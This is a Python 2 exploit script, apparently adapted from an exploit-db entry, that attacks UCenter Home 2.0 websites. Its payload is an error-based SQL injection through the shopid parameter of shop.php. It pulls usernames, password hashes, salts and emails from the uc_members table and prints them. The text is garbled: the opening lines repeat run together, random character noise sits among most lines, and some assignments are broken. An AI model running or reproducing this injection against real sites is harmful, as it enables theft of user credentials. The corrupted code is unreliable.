#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
, F9 a3 F# o0 s7 |/ g) g ) C: K7 q8 m; d$ z6 j
5 f4 y4 F& F* B: h/ m1 N2 I7 F
#!/usr/bin/env python
2 f ^; K$ c; D+ I; } 5 W. d% ^0 h0 s7 _
import sys
* n$ \3 O5 R1 j% g8 himport urllib2 % V$ U* y+ d) o" v
import re * X0 F/ F( i# @1 q# i/ v* O
7 D0 _; _) t# ]% Udef info():
. K9 V; J9 u; c$ y5 P( D9 f print 'From:http://www.exploit-db.com/exploits/14997/' ( W5 e1 U& x v( x N2 f( `: w/ b% Q
print 'http://www.hake.cc/Web_loudong/'
& H' ?. g4 k/ q$ E( L print 'changed:qiaoy'
# F' G! ]$ g, X) o( k; l print 'exp:'
G* Y! Q( q, F& Q; M# z( j print ' ./UCenter_Home_2.0.py site'
5 t% X" X+ r! T( M! U% e$ W
; {( B0 b3 [3 }* v5 Z! }def main(): 8 A! C C4 B% ^
if len(sys.argv) != 2: 0 D' L+ g: D8 U) S+ n! c, m
info() R! h7 V9 ?, W! {. _* `
else: . m# a i) _0 @/ E8 P& g
site = sys.argv[1] 6 j/ c( y. X6 X& s3 I6 e
if site[0:7] == 'http://':
. R: A4 s% [: K0 ` sitesite =site
' v/ t& P' C: |6 ~0 j7 I1 R. M elif site[0:8] == 'https://':
) ?' D9 N8 B! c sitesite = site - i6 Z$ F/ U s: U
else:
' K6 U. \, l5 P& A site = 'http://'+site : P9 W. }% R6 y% I& M6 @
try: ( J' k! V D6 b
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' 2 i! k5 ^6 U0 p+ k% G; ?2 {! i
Value = urllib2.urlopen(url).read() F5 m$ j+ a& D5 t' ^- c. x( P
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
. e8 r# \& Q6 i* z hacked = Msg.split(':') 5 n( x( n% `8 ?! E
print 'Name: '+hacked[1] 2 _4 B l: S& t" h& Q( T) ?
print 'Passwd: '+hacked[2]
* [4 g* j7 S* z6 i) _. n print 'salt: '+hacked[3]
P, s" H2 |; M; j3 x3 ]& K print 'email: '+hacked[4] " E* l# K, [1 M9 S. Q# f8 g5 c% N5 L/ r
except:
* E2 [$ S- p. O# [7 o print 'Sorry,I can\'t work............'
$ \1 @4 [0 k I: m% q1 o s4 B : {( }5 W; q6 S5 {& H
if __name__ == '__main__':
7 U+ w; ?. [8 N( O- L. o. R main() |